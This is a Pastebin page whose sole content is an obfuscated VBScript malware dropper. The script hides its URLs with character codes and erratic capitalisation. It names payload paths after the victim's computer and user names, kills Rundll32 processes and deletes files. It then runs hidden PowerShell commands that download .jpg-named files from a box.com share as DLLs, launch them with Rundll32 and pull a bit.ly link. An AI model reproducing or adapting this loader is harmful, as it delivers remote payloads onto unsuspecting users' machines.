Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- VBScript - script block
- on eRRoR ReSume neXT
- uRlhoST = "https://img0011021601.box.com/shared/static/"
- SXRBFR = "5sargpzrcjsyqj14uklmibxrr9hxfjrz.jpg"
- AKLXQU = "http://" & Chr(98) & Chr(105) & Chr(116) & Chr(46) & Chr(108) & Chr(121) & Chr(47) & "1Qeb1tz" & Chr(34)
- inSTalldiR = "%temp%"
- inSTall_id = "drmlb"
- UFVUWE = "starter"
- DAGSCQ = "mailstarter"
- JJPMRX = "kkecmbru28abw8rdrazqacn1tfflrwzb.jpg"
- inSTall_id2 = "wuovq"
- SeT Shellobj = wScRiPT.cReaTeobjecT("wScRiPT.Shell")
- SeT fileSySTemobj = cReaTeobjecT("ScRiPTing.fileSySTemobjecT")
- inSTalldiR = Shellobj.eXPandenviRonmenTSTRingS(inSTalldiR) & "\"
- Pcname = Shellobj.eXPandenviRonmenTSTRingS("%comPuTeRname%") & "_"
- uSeRname = Shellobj.eXPandenviRonmenTSTRingS("%uSeRname%")
- uSeRname = RePlace(uSeRname, " ", "")
- STRdiRecToRy = inSTalldiR & Pcname & uSeRname
- inSTallname = wScRiPT.ScRiPTname
- YLMQZB = Shellobj.SPecialfoldeRS ("YLMQZB") & "\"
- PaThfilename = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & ".dll"
- PaThfilename2 = inSTalldiR & Pcname & uSeRname & "_" & inSTall_id & "mail_.dll"
- MNIISL = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename & chR(44) & UFVUWE & chR(34)
- TKLKGG = ";STaRT-PRoceSS Rundll32.eXe " & PaThfilename2 & chR(44) & DAGSCQ & chR(34)
- fechaR = "TaSkkill /im Rundll32.eXe"
- ShelloBj.Run(fechaR),0
- if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
- on eRRoR ReSume neXT
- ShelloBj.Run(fechaR),0
- WScRiPT.SleeP 1500
- fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
- end if
- if fileSYSTemoBj.foldeReXiSTS(STRdiRecToRY) Then
- on eRRoR ReSume neXT
- ShelloBj.Run(fechaR),0
- WScRiPT.SleeP 1500
- fileSYSTemoBj.DeleTeFoldeR(STRdiRecToRY)
- end if
- fileSySTemobj.DeleTeFile(inSTalldiR & "*.cfg")
- 'if noT fileSySTemobj.foldeReXiSTS(STRdiRecToRy) Then
- ' fileSySTemobj.CReaTeFoldeR(STRdiRecToRy)
- 'end if
- PwSh1 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
- & chR(34) & uRlhoST & SXRBFR & ChR(39) & ChR(44) & ChR(39) & PaThfilename & chR(39) & chR(41) & MNIISL & chR(34)
- PwSh2 = "PoweRShell (new-objecT SySTem.neT.webclienT).downloadfile(" & chR(39) & chR(34) _
- & chR(34) & uRlhoST & JJPMRX & ChR(39) & ChR(44) & ChR(39) & PaThfilename2 & chR(39) & chR(41) & TKLKGG & chR(34)
- PwSh3 = "PoweRShell (new-objecT neT.webclienT).downloadSTRing(" & chR(39) & AKLXQU & chR(39) & chR(41) & chR(34)
- if noT fileSySTemobj.fileeXiSTS (PaThfilename) Then
- on eRRoR ReSume neXT
- Shellobj.Run(PwSh1),0
- Shellobj.Run(PwSh2),0
- Shellobj.Run(PwSh3),0
- End If
Add Comment
Please, Sign In to add comment